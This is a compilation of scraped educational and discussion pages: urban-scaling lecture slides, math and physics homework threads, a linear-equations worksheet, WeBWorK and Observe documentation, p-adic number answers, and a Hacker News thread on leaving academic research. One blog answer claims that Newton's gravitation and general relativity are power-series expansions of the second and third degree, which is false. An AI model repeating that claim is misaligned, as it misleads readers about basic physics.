Bettencourt-West or Marshall’s law

Source: Bettencourt et al. (2007)

• Not surprisingly, another straight line
• Another power law

Bettencourt-West or Marshall’s law

Source: Bettencourt et al. (2007)

Bettencourt-West or Marshall’s law

An average urban dweller in the capital, Lisbon, has approximately twice as many reciprocated mobile phone contacts, k, as an average individual in the rural town of Lixa. Source: Bettencourt (2021)

Bettencourt-West or Marshall’s law

• $Y=3P^b$
• 300 random observations
• Plotting the results
• Economies of scale
• $b<1$ decreasing returns to scale
• $b=1$ constant returns
• $b>1$ increasing returns
• SF networks, economies of scale?

Revisit economies of scale

Epilogue

Bettencourt (2021): Cities, of course, do not really have their own dynamics; they depend on decisions made by people, corporations, governments, and others. The aggregate statistics of all their decisions will therefore emerge as key and provide another connection to the uses of information in urban science.

References

Albert, Réka, Hawoong Jeong, and Albert-László Barabási. 2000. “Error and Attack Tolerance of Complex Networks.” Nature 406 (6794): 378–82.

Barabási, Albert-László, and Réka Albert. 1999. “Emergence of Scaling in Random Networks.” Science 286 (5439): 509–12.

Batty, Michael. 2013. The New Science of Cities. MIT Press.

Bettencourt, Luís MA. 2021. “Introduction to Urban Science: Evidence and Theory of Cities as Complex Systems.”

Bettencourt, Luís MA, José Lobo, Dirk Helbing, Christian Kühnert, and Geoffrey B West. 2007. “Growth, Innovation, Scaling, and the Pace of Life in Cities.” Proceedings of the National Academy of Sciences 104 (17): 7301–6.

Coe, Neil M, Philip F Kelly, and Henry WC Yeung. 2019. Economic Geography: A Contemporary Introduction. John Wiley & Sons.

Erdős, Paul, Alfréd Rényi, et al. 1960. “On the Evolution of Random Graphs.” Publ. Math. Inst. Hung. Acad. Sci 5 (1): 17–60.

O’Sullivan, Arthur. 2012. Urban Economics. 8th ed.

Torres, Sonia H, María Montes de Oca, Eduardo Loeb, Priva Zabner-Oziel, Valentina Wallis, and Noelina Hernández. 2009. “Isoenzimas de Lactatodeshidrogenasa en el Músculo Esquelético de Pacientes con EPOC.” Archivos de Bronconeumología 45 (2): 75–80.

Watts, Duncan J, and Steven H Strogatz. 1998. “Collective Dynamics of ‘Small-World’ Networks.” Nature 393 (6684): 440–42.
https://www.gradesaver.com/textbooks/math/geometry/geometry-common-core-15th-edition/chapter-7-similarity-common-core-cumulative-standards-review-selected-response-page-486/15
## Geometry: Common Core (15th Edition)

area of deck = $80$ $m^2$

If we want to find the area of the deck in the real world and not according to the scale drawing, let us convert the scale drawing to real-world measurements first. We know that the scale is $1$ $in.$ = $2$ $m$, so let's set up proportions to find the dimensions in real life.

Let's convert the width of the pool first: $\frac{1}{2} = \frac{2}{x}$. Use the cross products property to eliminate the fractions: $x = 4$ m.

Now, we convert the length of the pool: $\frac{1}{2} = \frac{6}{x}$. Use the cross products property: $x = 12$ m.

Next, we convert the width of the deck and pool combined: $\frac{1}{2} = \frac{4}{x}$. Use the cross products property: $x = 8$ m.

Finally, we convert the length of the deck and pool combined: $\frac{1}{2} = \frac{8}{x}$. Use the cross products property: $x = 16$ m.

We want the area of just the deck, which we get by subtracting the area of the pool from the area of the pool and deck together. The area of a rectangle is $A = lw$, where $A$ is the area, $l$ is the length, and $w$ is the width.

Area of the pool itself: $A = (4 \, m)(12 \, m) = 48$ $m^2$.

Area of the combined pool and deck: $A = (8 \, m)(16 \, m) = 128$ $m^2$.

To find the actual area of the deck, we subtract the area of the pool from the combined area of the pool and the deck together: area of deck = $128$ $m^2 - 48$ $m^2 = 80$ $m^2$.
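The conversions and the final subtraction can be condensed into a few lines (a sketch; the drawing measurements in inches come from the proportions used in the solution):

```python
SCALE = 2  # metres of real length per inch of the drawing

# Drawing measurements, in inches.
pool_w_in, pool_l_in = 2, 6
total_w_in, total_l_in = 4, 8  # pool and deck combined

pool_area = (pool_w_in * SCALE) * (pool_l_in * SCALE)     # 4 m * 12 m = 48 m^2
total_area = (total_w_in * SCALE) * (total_l_in * SCALE)  # 8 m * 16 m = 128 m^2
deck_area = total_area - pool_area

print(deck_area)  # 80
```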
https://www.physicsforums.com/threads/thin-film-interference.955360/
# Thin film interference

## Homework Statement

Between two pieces of glass (##n_1=1.70##), there is a thin film of water (##n_2=1.33## and thickness ##d=1 \mu m##). If there is normal incidence of white light on the water surface, find:

(a) which wavelengths can be seen in the transmitted light (answer: 667 nm, 533 nm, 444 nm, 381 nm)

(b) which wavelengths can be seen in the reflected light (answer: 593 nm, 484 nm, 410 nm, (355 nm))

## The Attempt at a Solution

(a) I don't know how to deal with transmitted light.

(b) I set ##2d= \left(m-\frac{1}{2} \right) \cdot \frac{\lambda}{n_2}## to find the lambdas for ##m=1,2...## but I obtain only ##\lambda_{m=1}=355 nm## (below the light that can be seen). Any help?

TSny, Homework Helper, Gold Member:

> (a) I don't know how to deal with transmitted light.

You can assume that none of the light is absorbed by the material. So, the total amount of incoming light energy must be conserved. As less light is reflected, more light must be transmitted. And vice versa.

> (b) I set ##2d= \left(m-\frac{1}{2} \right) \cdot \frac{\lambda}{n_2}## to find the lambdas for ##m=1,2...## but I obtain only ##\lambda_{m=1}=355 nm## (below the light that can be seen).

Your equation looks OK. But, in order to get a wavelength of 355 nm, I have to let m = 8. You will need to choose values of m that yield visible wavelengths.

> You can assume that none of the light is absorbed by the material. So, the total amount of incoming light energy must be conserved. As less light is reflected, more light must be transmitted. And vice versa.

Thanks. But how can I set the equation for the constructive interference in the first case? There is no interference since the light is transmitted(?)

TSny, Homework Helper, Gold Member:

> Thanks. But how can I set the equation for the constructive interference in the first case? There is no interference since the light is transmitted(?)
There is always interference (constructive, destructive, or something in between) in the transmitted waves and in the reflected waves. Standard textbooks show how you get two reflected rays that interfere. See if you can show how to get two transmitted waves that interfere. Hint: One of the transmitted rays has no reflections. The other transmitted wave has more than one reflection.
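Numerically, both conditions in this thread work out as follows. With glass on both sides of the water and n₁ > n₂, only the water→glass reflection is off a denser medium, so exactly one reflection picks up a π phase shift: reflection maxima satisfy 2d = (m − ½)λ/n₂ and transmission maxima satisfy 2d = mλ/n₂. A sketch (values agree with the quoted answers to within a couple of nanometres, which is presumably rounding in the book):

```python
d = 1000.0  # film thickness in nm (1 micrometre)
n2 = 1.33   # refractive index of water

def reflected_max(m):
    # 2*d = (m - 1/2) * lam / n2  =>  lam = 2*d*n2 / (m - 1/2)
    return 2 * d * n2 / (m - 0.5)

def transmitted_max(m):
    # 2*d = m * lam / n2  =>  lam = 2*d*n2 / m
    return 2 * d * n2 / m

# Orders that land near the visible range:
print([round(reflected_max(m)) for m in range(5, 9)])    # [591, 484, 409, 355]
print([round(transmitted_max(m)) for m in range(4, 8)])  # [665, 532, 443, 380]
```

This also shows why m = 8 is the order that produces the student's 355 nm in reflection.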
https://www.edugain.com/sampleWorksheet/grade-9/Linear-Equations-in-Two-Variables/Online
### Choose correct answer(s) from given choice

1) Find the point where the linear equation 4x + 4y = 32 intersects the x-axis.
a. (8, 0) b. (0, 4) c. (0, 8) d. (4, 0)

2) At what point does the line represented by the equation 8x + 4y = 8 intersect a line which is parallel to the y-axis, at a distance of 3 units from the origin in the negative direction of the x-axis?
a. (0, 4) b. (-3, 0) c. (0, 8) d. (-3, 8)

3) A telecom operator charges $1.1 for the first minute and $0.7 per minute for subsequent minutes of a call. If the duration of the call is represented as d, and the amount charged is represented as c, find the linear equation for this relationship.
a. c = 1.1d + 0.7 b. c = 0.7d + 1.1 c. c = 1.1d + 0.4 d. c = 0.7d + 0.4

4) In the graph of the linear equation 4x + 3y = 34, there is a point such that its ordinate is 5 less than its abscissa. Find the coordinates of the point.
a. (6, 1) b. (1, 6) c. (2, 7) d. (7, 2)

5) Find the linear equation represented in the graph below.
a. q/p b. pq c. 1 d. p/q

6) Equation 6x + 3y = 6 has
a. No solution b. Infinitely many solutions c. Two solutions d. A unique solution

7) If the graph of the equation y = mx + c passes through the origin, what is the value of c?
a. -1 b. 0 c. 2 d. 1

8) Find the linear equation represented in the graph below.
a. y = - 2 b. y = -x + 2 c. y = 2 d. y = 0

9) A line passes through points (-3, -14) and (1, 2). Find the x-intercept of the line.
a. -0.5 b. 0.5 c. 1 d. 0

10) If solutions of a linear equation are (-2, 2), (0, 0) and (2, –2), find the equation.
a. -2x + y = 0 b. x - y = 0 c. x + y = 0 d. x -2y = 0
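Question 9 can be checked by computing the line through the two given points and then its x-intercept (a quick sketch):

```python
# Line through (-3, -14) and (1, 2): find where it crosses the x-axis.
x1, y1 = -3, -14
x2, y2 = 1, 2

slope = (y2 - y1) / (x2 - x1)    # (2 - (-14)) / (1 - (-3)) = 16 / 4 = 4
intercept = y1 - slope * x1      # y = 4x - 2, so c = -2
x_intercept = -intercept / slope # set y = 0 and solve for x

print(x_intercept)  # 0.5
```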
https://webwork.maa.org/moodle/mod/forum/discuss.php?d=6366
## WeBWorK Problems

### Multiple Choice with Fill in the Blank

by Brittni Lorton - Number of replies: 7

I tried to find something like this in the forum but I was coming up blank. Is it possible to have a question be multiple choice (i.e., Radio or Checkbox) and ALSO include fill in the blank? Something that would look like:

Determine the solution to the given system of equations.

• The system has one unique solution at ____ (student would have to select this one AND fill in the blank with the solution point)
• The system has no solutions
• The system has infinitely many solutions.

Any thoughts? Thank you, *Brittni

In reply to Brittni Lorton

### Re: Multiple Choice with Fill in the Blank

by Glenn Rice -

Yes it is possible. It is not easy though. I have a macro that I use for this that makes it a little easier. It works much like the multi answer macro, and you have to provide a checker routine. It takes a little more work to set up the problem as well. Due to the nature of the structure used, the checker is a little more complex. At some point I plan to add it to the PG macros.

I have attached the macro and an example if you would like to try it out. There is documentation in the file. Feel free to ask if you need additional help.

In reply to Glenn Rice

### Re: Multiple Choice with Fill in the Blank

by Glenn Rice -

Here is another example that uses the macro in a simpler way. The format and tex_format options are not required. I realized that both this example and the previously attached example use the default checker, and do not need to provide one. For some simpler problems this is possible.

In reply to Glenn Rice

### Re: Multiple Choice with Fill in the Blank

by Glenn Rice -

Here is another example that does need a checker routine.

In reply to Glenn Rice

### Re: Multiple Choice with Fill in the Blank

by Brittni Lorton -

This is very helpful! The examples are really helping me understand the concepts, so I appreciate it.
I am wondering what would be best for me in terms of including the macro on my server. I do not have server access, so I will reach out to our sys admin and see where he puts all the macros, and if this one proves to be helpful then I'll have him add it where the other ones are - unless someone has a different suggestion? This will be the first time I've had to use an additional macro not already included, so I am unfamiliar with best practices here. Thank you!

In reply to Brittni Lorton

### Re: Multiple Choice with Fill in the Blank

by Paul Seeburger -

Hi, Brittni! You should be able to add new or adjusted macros to your macros folder in the templates folder for your course. They will only affect problems in your course this way, but it will allow you to make use of them. Paul

In reply to Paul Seeburger

### Re: Multiple Choice with Fill in the Blank

by Brittni Lorton -

Hi Paul! Yes, I am doing that right now, but I am thinking of best practices: if we want to use this for all of our courses and colleges here, where is the best location for these additional macros? Maybe each school does it a little differently, but I was just curious if there is a best practice in terms of where to put these on the servers so that we don't have to upload them separately to each course.

In reply to Brittni Lorton

### Re: Multiple Choice with Fill in the Blank

by Alex Jordan -

You have a lot of options for where you could put a common version of a macro file, assuming you have access to the server side of things. In localOverrides.conf, you have this line: https://github.com/openwebwork/webwork2/blob/cfb690ade3d3c55527d522ed1a8f1defd5e19f6a/conf/localOverrides.conf.dist#L267 You can add a path to the list of paths that are searched for macro library files. So (this is just one option) you could make a course that is for development purposes only, and put new macro library files there in its macros folder.
Then add that folder to the list of paths with something like:

$pg{directories}{macrosPath} = [@{$pg{directories}{macrosPath}}, "/opt/webwork/courses/developmentCourse/templates/macros"];

Then all courses will be able to use whatever is in that macro library folder.
https://docs.observeinc.com/en/latest/content/metrics/ExpressionBuilder.html
# Adding Metrics Using the Expression Builder

The Expression Builder feature allows you to build metrics expressions in Observe. For instance, you might want to visualize CPU usage for an application. You can add metrics to a new or existing worksheet or dashboard.

## Accessing the Expression Builder

You can access the Expression Builder using one of three methods:

### From a Metrics dataset

1. In Observe, click Explore, and then click Metrics.
   Figure 1 - The Metrics landing page
2. Select a metric from the list of available metrics.
3. On the Metric Selected card, click Open In Worksheet.
4. Locate the Expression Builder tab underneath the displayed data.
   Figure 2 - Metrics Worksheet with Expression Builder

### Add a metric to a Worksheet

To add a metric to a worksheet, use the following steps:

1. Open an existing worksheet or create a new one from an event dataset.
2. Click Add Content and select Metrics.
3. Select a metric from the list of related metrics.
   Figure 3 - Adding Metrics to a Worksheet

### Access from Dashboard

Access the Expression Builder from a Dashboard card:

1. In Observe, click Explore, and then Dashboards.
2. Select a Dashboard from the list.
3. On a card with metrics, click the More icon, and select Open in Worksheet.
4. Click Add Content and select Metrics.
5. Select a metric, such as cpu_utilization, and click Select.
6. Locate the Expression Builder tab underneath the displayed data.

## Overview of Expression Builder

### Section One - Expression Builder

• Metric - When you click Metric under Add Content, Observe displays a list of available metrics that you can select to add.
  Figure 4 - Select from a list of available metrics.
• where - select from a list of available filters for the metric. This is an optional parameter.
• Sum by - the default value for the OPAL function is Sum by. You can select from the following list of available OPAL functions:
  • Any - Return any value of one column across a group.
  • Any not null - Return any non-null value of one column across a group. Can still return null if all values in the group are null.
  • Average - Calculate the arithmetic average of the input expression across the group.
  • Count Values - Count the number of non-null items in the group.
  • Count Distinct Fast - Estimate the approximate number of distinct values in the input using hyper-log-log.
  • Count Distinct Exact - Count the exact number of distinct values in the input using complete enumeration.
  • Maximum - Compute the maximum of one column across a group (with one argument) or the scalar greatest value of its arguments (with more than one argument).
  • Median - Return the fast approximate median value of one column.
  • Median Exact - Return the exact median value of one column.
  • Minimum - Compute the minimum of one column across a group (with one argument) or the scalar least value of its arguments (with more than one argument).
  • Percentile(99) - Returns an approximated value for the specified percentile of the input expression across the group: percentile(@."metric", .99)
  • Percentile(95) - Returns an approximated value for the specified percentile of the input expression across the group: percentile(@."metric", .95)
  • Percentile(90) - Returns an approximated value for the specified percentile of the input expression across the group: percentile(@."metric", .90)
  • Percentile(75) - Returns an approximated value for the specified percentile of the input expression across the group: percentile(@."metric", .75)
  • Percentile(50) - Returns an approximated value for the specified percentile of the input expression across the group: percentile(@."metric", .50)
  • Prometheus Quantile(99) - Returns a value for the 99th percentile distribution.
  • Prometheus Quantile(95) - Returns a value for the 95th percentile distribution.
  • Prometheus Quantile(90) - Returns a value for the 90th percentile distribution.
  • Prometheus Quantile(75) - Returns a value for the 75th percentile distribution.
  • Prometheus Quantile(50) - Returns a value for the 50th percentile distribution.
  • Standard Deviation - Calculate the standard deviation across the group.
  • Sum - Calculate the sum of the argument across the group, or of the scalar arguments if more than one.
  • Don't Aggregate - Do not aggregate metrics.

Note: You can only use Prometheus Quantile parameters with Prometheus metrics ending in _bucket.

• by - Select a field from the list of available fields to filter the metric.
• Add formula - Add a formula to further refine your data. For instance, you can add A*100 to multiply your results by 100.

If you click the More icon next to Field, you can see the following options:

Figure 5 - More options for metric expressions

• Add function > TopK - Selects all data for each of the top k ranked groups.
• Adjust alignment - Aggregates the metric to an average of the data over a minute. Automatically enabled by default.
• Adjust resolution - Set the length of time to collect data. Automatically enabled by default.
• Delete - Removes the metric expression from the monitor.

### Adding CPU Utilization Metrics to a Worksheet

1. In Observe, click Explore, and then click Datasets.
2. From the list of datasets, select CPU Metrics.
3. Click the Worksheet icon to create a worksheet from the metrics.
4. Click Add Content and then select Metric.
5. In the Search field of the metrics, enter cpu_utilization, and select it from the list.
6. A new stage, Stage 2, displays on the worksheet.
7. The Expression Builder displays the data using Sum; selecting Average instead shows the average CPU usage. Select the type of average from the by list.
8. The metrics average by Host by default, but you can select from the following parameters:
   • cpu
   • host
   • datacenter
   • field
   • value

Figure 6 - Adding CPU utilization to the CPU Metrics worksheet.
Figure 7 - Usage per User with Sum by Host

You can also filter the metric using JSON and parameters contained in columns.
Figure 8 - Filtering the CPU Utilization metric using JSON in the field column.
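The aggregation choices above (Sum, Average, Percentile, grouped "by" a field) behave like ordinary group-by reductions. The following is a rough, Observe-independent sketch in plain Python; the host names and utilization values are invented purely for illustration and are not Observe APIs:

```python
# Illustrative only: emulating "Sum of cpu_utilization, by host" and
# "Average of cpu_utilization, by host" outside Observe.
from collections import defaultdict

records = [
    {"host": "web-1", "cpu_utilization": 40.0},
    {"host": "web-1", "cpu_utilization": 60.0},
    {"host": "web-2", "cpu_utilization": 10.0},
    {"host": "web-2", "cpu_utilization": 30.0},
]

def group_by(rows, key, field):
    """Collect the values of `field` into one list per value of `key`."""
    groups = defaultdict(list)
    for r in rows:
        groups[r[key]].append(r[field])
    return groups

groups = group_by(records, "host", "cpu_utilization")

sum_by_host = {h: sum(v) for h, v in groups.items()}
avg_by_host = {h: sum(v) / len(v) for h, v in groups.items()}

print(sum_by_host)  # {'web-1': 100.0, 'web-2': 40.0}
print(avg_by_host)  # {'web-1': 50.0, 'web-2': 20.0}
```

The "Add formula" option (e.g. A*100) then corresponds to mapping a further arithmetic expression over each aggregated value.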
https://www.acooke.org/cute/TaylorExpa0.html
## Taylor Expansions of Spacetime

From: andrew cooke <andrew@...>
Date: Tue, 22 Dec 2015 11:01:02 -0300

Q: If spacetime were an analytic manifold, could we see into the future by expanding locally as a power series?

A: This is what physics attempts to do: expand physical laws in terms of a power series. For example, Newton's law of gravitation expanded the force of gravity to the second degree, and Einstein's general relativity extends this to degree three.

Andrew
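The idea of predicting forward in time from local derivatives can be sketched numerically. This small example (added here, not from the original exchange) uses uniformly accelerated motion, where the degree-2 Taylor expansion is exact because all higher derivatives vanish:

```python
# Sketch: predicting x(t + dt) from local derivatives via a Taylor series.
# Illustrative case: constant acceleration, so the degree-2 expansion
# reproduces the exact trajectory.

def taylor_predict(x, v, a, dt):
    """Degree-2 Taylor expansion: x(t+dt) ~ x + v*dt + a*dt**2/2."""
    return x + v * dt + a * dt ** 2 / 2

# Free fall from rest at height 100 m, with g = 9.8 m/s^2 downward.
g = -9.8
x0, v0 = 100.0, 0.0

def exact(t):
    return x0 + v0 * t + g * t ** 2 / 2

dt = 2.0
predicted = taylor_predict(x0, v0, g, dt)
print(predicted, exact(dt))
```

For laws that are not polynomial in time, the expansion is only local: the series predicts the near future well, and degrades as dt grows.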
https://www.physicsforums.com/threads/separation-of-variables.673241/
# Homework Help: Separation of variables

1. Feb 20, 2013

### aaaa202

Suppose you have some partial DE describing a physical system with 2 degrees of freedom (e.g. the SE). If you try separation of variables you get something like:

Hg(x)h(y) = Eg(x)h(y)

Now you can separate this into two equations, but the energy has to go in one of them. Is the final expression for the energy dependent on which one you choose to put it in?

2. Feb 21, 2013

### vela

Staff Emeritus

E typically doesn't go with one or the other. When separation works, what happens is you get
$$\hat{H}[g(x)h(y)] = G(x)h(y) + g(x)H(y).$$
The Hamiltonian acts on each piece separately. Then you can divide both sides by g(x)h(y) to get
$$\frac{G(x)}{g(x)} + \frac{H(y)}{h(y)} = E.$$
The only way this can be satisfied for all x and y is if the two terms on the left are each constants. The energy is the sum of those constants.
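As a concrete instance of this splitting (a worked example added here; the particular system is my choice, not from the thread), take a particle in a 2D box with side lengths $a$ and $b$:

```latex
\[
  \hat{H} = -\frac{\hbar^2}{2m}\left(\partial_x^2 + \partial_y^2\right),
  \qquad \psi(x,y) = g(x)\,h(y)
\]
\[
  -\frac{\hbar^2}{2m}\,g''(x) = E_x\,g(x), \qquad
  -\frac{\hbar^2}{2m}\,h''(y) = E_y\,h(y)
\]
\[
  g_n(x) = \sin\frac{n\pi x}{a}, \qquad
  h_m(y) = \sin\frac{m\pi y}{b}, \qquad
  E = E_x + E_y = \frac{\hbar^2\pi^2}{2m}
      \left(\frac{n^2}{a^2} + \frac{m^2}{b^2}\right)
\]
```

Neither separation constant is singled out as "the" energy; $E$ is the sum of the two, exactly as in the answer above.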
https://math.stackexchange.com/tags/p-adic-number-theory/hot?filter=all
# Tag Info

## Hot answers tagged p-adic-number-theory

217 votes, Accepted

### Why does an argument similar to 0.999...=1 show 999...=-1?

If you want to understand the mathematics behind these things, it is all based upon the notions of 'convergence' and of 'limits'. If you read any first course in analysis textbook you will find the ...
• 2,504

114 votes

### Why does an argument similar to 0.999...=1 show 999...=-1?

In the $10$-adic numbers it is true that $\dots 9999 = -1$. More precisely, the series $\sum_{n=0}^{\infty} 9 \cdot 10^n$ converges in $\mathbb{Q}_{10}$ and its limit there is $-1$.
• 41.2k

46 votes

### Why does an argument similar to 0.999...=1 show 999...=-1?

As other users have noted, it doesn't make sense to have infinitely many nines to the left of the decimal point. This is because the sequence $9, 99, 999, \ldots$ doesn't converge to anything, unlike ...
• 12.4k

33 votes, Accepted

### Units of p-adic integers

This must be covered in almost every text on the $p$-adic numbers; I think the book of Gouvêa is the best of these. And your statement is not quite true: for $p=2$, $\mu_{p-1}$ is trivial all right, ...
• 60.5k

26 votes, Accepted

### Ring of the integer $p$-adic numbers $\mathbb{Z}_p$

Let's look at a different ring first: $R=k[[X]]$, the ring of formal power series over a field. We can also think of $R$ as the ring of sequences $f_0, f_1, f_2,\ldots$, where each $f_i$ is a ...
• 29.4k

25 votes, Accepted

### Method of finding a p-adic expansion to a rational number

The short answer is, long division. Say you want to find the $5$-adic expansion of $1/17$. You start by writing $$\frac{1}{17}=k+5q$$ with $k \in \{0,1,2,3,4\}$ and $q$ a $5$-adic integer (that is, ...
• 36.8k

23 votes

### Why does an argument similar to 0.999...=1 show 999...=-1?

One thing to think about is how this plays with modular arithmetic, if you're familiar. Basically, arithmetic mod $10^n$ is arithmetic where we only care about the last $n$ digits of a number and is ...
• 59.1k

23 votes
• 32.9k

14 votes, Accepted

The question of whether two "numbers" are "equal" is a somewhat subtle one. For example, let's work with a simpler number, namely "2". Certainly $2\in\mathbb{Z}$, but also $2\in\mathbb{Q},2\in\mathbb{...
• 11.9k

14 votes

### Why are $p$-adic numbers and $p$-adic integers only defined for $p$ prime?

I was going on at too great length in a comment to a discussion between Henning Makholm and Hurkyl, so let me put it all into an answer instead: To show that $\Bbb Z_{10}\cong\Bbb Z_2\times\Bbb Z_5$, ...
• 60.5k

13 votes, Accepted

### sequence $\{a^{p^{n}}\}$ converges in the p-adic numbers.

Recall that the Euler totient function has values $\phi(p^n)=p^{n-1}(p-1)=p^n-p^{n-1}$ for all $n$. This means that for all $a$ coprime to $p$ we have the congruence $$a^{p^n}\equiv a^{p^{n-1}}\pmod{...
• 125k

13 votes

### Method of finding a p-adic expansion to a rational number

In the case of $-1/6$, it's very easy: $$-\frac{1}{6} = \frac{1}{1-7} = \sum_{k=0}^{\infty} 7^k.$$ What happens: in the $p$-adic numbers, the sequence $p^k$ is a null sequence (as $|p^k|_p = p^{-k} \overset{...
• 17.9k

13 votes, Accepted

### Totally ramified extensions of $\mathbb{Q}_p$

This is an exercise I've never done, but it should be a lot of fun. What is the general Eisenstein polynomial in this case? It'll be $$X^3 + 2aX^2+2bX+2(1+2c)\,,$$ where $a$, $b$, and $c$ can be any ...
• 60.5k

13 votes, Accepted

### A puzzle involving 10-adic numbers

I saw this observation in a math book once when I was 16 or so and was totally baffled at the time. It's nice to know I understand it now! As you say, the starting point is to use CRT, which allows us ...
• 387k

12 votes, Accepted

### The maximal unramified extension of a local field may not be complete

This is a natural question, because it's really easy to get overwhelmed by the situation. In the case of the completion of the maximal unramified extension of a local field $k$, here's the way that I look at ...
• 60.5k

12 votes

### If $B$ is an abelian group, then is $B{\otimes}_{\mathbb Z}{\mathbb Z}_p$ isomorphic to ${\varprojlim}B/p^{n}B$?

This is false in general: consider $B = \mathbb{Q}$. Then $\mathbb{Q} \otimes_{\mathbb{Z}} \mathbb{Z}_p \cong \mathbb{Q}_p$, but $\mathbb{Q} / p^n \mathbb{Q} = 0$ for every $n$, so $\varprojlim_n \...
• 2,472

12 votes, Accepted

### Various p-adic integrals

Not really a full answer, but some comments (that hopefully answer some of your queries). There seems to be a big confusion here: what do we want to integrate, i.e. to define $\int_{\mathbb{Z}_p} f(...
• 2,034

12 votes

### Why are p-adic numbers and p-adic integers only defined for p prime?

You can speak about 10-adic numbers just fine, but they don't behave as nicely as p-adic numbers. For example, the 10-adic integers have zero divisors, so no matter how you complete or massage ...

11 votes, Accepted

### examples of unramified extensions of $\mathbb{Q}_p$

You get unramified extensions of $\Bbb Q_p$ by adjoining roots of unity of order prime to $p$; alternatively, by adjoining $(p^n-1)$-th roots of unity. The finite unramified extensions of $\Bbb Q_p$ ...
• 60.5k

11 votes

### Why introduce the p-adic numbers?

On one hand, the p-adic numbers are extremely natural objects of study: by Ostrowski's theorem every nontrivial absolute value on $\mathbf Q$ is equivalent to either the usual absolute value or the ...
• 496

11 votes, Accepted

### Classical number theoretic applications of the p-adic numbers

One of my favourite classical results using p-adic methods in elementary number theory is the theorem of Skolem-Mahler-Lech: This is a theorem about linear recurrence sequences, which are sequences ...
• 4,315

10 votes

### Which p-adic fields contain these numbers?

There are several ways of attacking questions like this. The most general is to transform your defining equation (such as for $\sqrt{-7}$, which I'll use as the type example) into something to which ...
• 60.5k

10 votes, Accepted

### Is $123456788910111121314\cdots$ a p-adic integer?

This is not an $n$-adic integer or a $p$-adic integer. A pivotal idea of a $p$-adic integer is that it can be well-represented in a sort-of-base-$p$, $$x = \sum_{k \geq \ell}a_kp^k,$$ and in ...
• 87.6k

10 votes

### Why does an argument similar to 0.999...=1 show 999...=-1?

This argument is similar to the one $$\sum_{n=1}^\infty n = -1/12$$ which went viral a few years ago. You are actually using methods which were originally designed for manipulating absolutely ...
• 659

10 votes, Accepted

### Is there a concept of continuous curves and surfaces in a p-adic field?

The $p$-adic numbers are a metric space, and thus a topological space. Therefore continuity is well defined, either by the $\varepsilon,\delta$ definition that you know from Calculus, or by the ...
• 60.5k

Only top scored, non community-wiki answers of a minimum length are eligible
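The long-division idea from the "Method of finding a p-adic expansion" answers can be sketched in a few lines of Python (an illustration added here, not code from the thread): at each step pick the digit $k \in \{0,\dots,p-1\}$ with $a/b = k + pq$, then recurse on $q$.

```python
# Sketch of computing the base-p digits of a rational a/b as a p-adic
# integer (requires gcd(b, p) = 1 so that b is invertible mod p).

def padic_digits(a, b, p, n):
    """First n base-p digits of a/b, least significant first."""
    inv_b = pow(b, -1, p)          # inverse of b mod p (Python 3.8+)
    digits = []
    for _ in range(n):
        k = (a * inv_b) % p        # unique digit with a ≡ k*b (mod p)
        digits.append(k)
        a = (a - k * b) // p       # remaining p-adic integer q = (a/b - k)/p
    return digits

# -1/6 in Q_7: -1/6 = 1/(1-7) = 1 + 7 + 7^2 + ..., so every digit is 1.
print(padic_digits(-1, 6, 7, 6))   # [1, 1, 1, 1, 1, 1]

# ...999 = -1 in the 10-adics: every digit of -1 is 9.
print(padic_digits(-1, 1, 10, 5))  # [9, 9, 9, 9, 9]
```

The second call illustrates the top-voted answers directly: truncating $-1$ after $N$ ten-adic digits gives $10^N - 1$, i.e. a string of $N$ nines.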
https://news.ycombinator.com/item?id=2235349
Goodbye to academic research

270 points by rsaarelm on Feb 18, 2011 | 92 comments

Reading this article makes me realize I certainly picked the road not taken. Last year I quit my job as the Director of IT at a small pharma, dropped out of a company-paid MBA program, drastically reduced my expenses, and started doing independent research. A lot of people around me thought I was crazy, especially since I wasn't going the PhD or startup route either. In my mind though, it seems pretty logical - I want to do real computer science research without all the BS that goes on in academia or a corporate research lab. I'm more productive when working solo than in teams. And I already have a specific research project in mind. All I needed was to plan my life so I'd have 50-60 hr/week free after my bills were paid. For the past two months, I've been working on my research project diligently and without any external delays. I know I won't get a degree out of this and I doubt I can get published, but since that's not my end-goal, it doesn't matter. I am looking for a hardware hacker if anyone is interested - it is a very fun/rewarding project: http://ktype.net

I did the same thing about ten years ago: I quit a high-paying job in Zurich, moved to Prague on-the-cheap, and hired two Czech PhD students part-time. We spent five years doing CS research and it was always two steps forward, one back. Every three or four months we would throw everything out and start again; and we had the freedom to do so. There was no installed base, no one tapping their fingers expectantly. Looking back, I wouldn't have done it any other way. I think you made a great choice. Good luck!

Would you mind telling us what has happened since?

Sure. The mission was to find a new way to approach how software is constructed.
The result is called Kayia and it's here: http://kayia.org/kayia.pdf

It hit 'singularity' (everything came down to a graph edge; the system is comprised of nothing else) in 2005. I've had some great advisors and the feedback is consistent: "That it's unique is not interesting if it's not compelling. Show how it's compelling." So I've stumbled with my limited resources over the years to do that, and I've come up with a database, of all things, but it's actually the "programming language" masquerading as a database. I'm thinking of offering it as a service, and if you want to see where that's going, it's at http://www.kayadb.com (although it's not meant to be looked at yet). I'll do a Tell HN in a few weeks when it's closer to being ready to show.

Is it open source? Can you also provide a link to the source code? Is it an RDBMS or a NoSQL? How can I download and use your DB?

It's not ready yet. It's NoSQL, scales to 4EB on the back-end, but handles the relational model. Not open source for varying reasons. It will be a service at first. But it's not ready yet. I'll definitely let HN know when it is, and if anyone wants to be an early user, please contact me.

It sounded unique enough that I wanted to experiment with a ML algorithm, but our product is GPL, so if it's not open source we cannot use it for legal reasons.

I feel for you... creating a better paradigm is a compelling problem but can also be a seductive trap. It's hard to have a new paradigm without a compelling "front end" - either a powerful tool or some really simple example code. Another thought: software development is plagued by a set of "typical problems". Another way to present a new paradigm would be to show a few problems with a discussion of how your approach would get around them. The world is full of powerful languages.
Their problem is that they give you a bigger cannon to shoot yourself in the foot with after a point. If you want to create a truly "amazing new paradigm", show ways that you would either untangle an existing mess or prevent that mess from happening.

Doing independent research like this is very cool. I admire your willingness to take such a risk and make this sacrifice. One comment I would add is that, while you might be more "productive" solo (less context switching/blocking, I assume ;), working with others forces you to maintain a persuasive, crisp story about why what you're doing is the right thing. While early, exploratory research can temporarily delay the need for this story, it can't be delayed long! From the info on your website, it looks like you are developing keyboard layouts that would be useful for people with disabilities. However, I was unable to figure out what your elevator speech for this work might be. What is your hypothesis? What evidence do you have for it? What disability(ies) are you targeting? How will a new mobile keyboard help? Lastly, this looks like a useful project for others (you're not just proving random theorems in your basement :)! Why not re-frame this in your mind as a startup? Good luck!

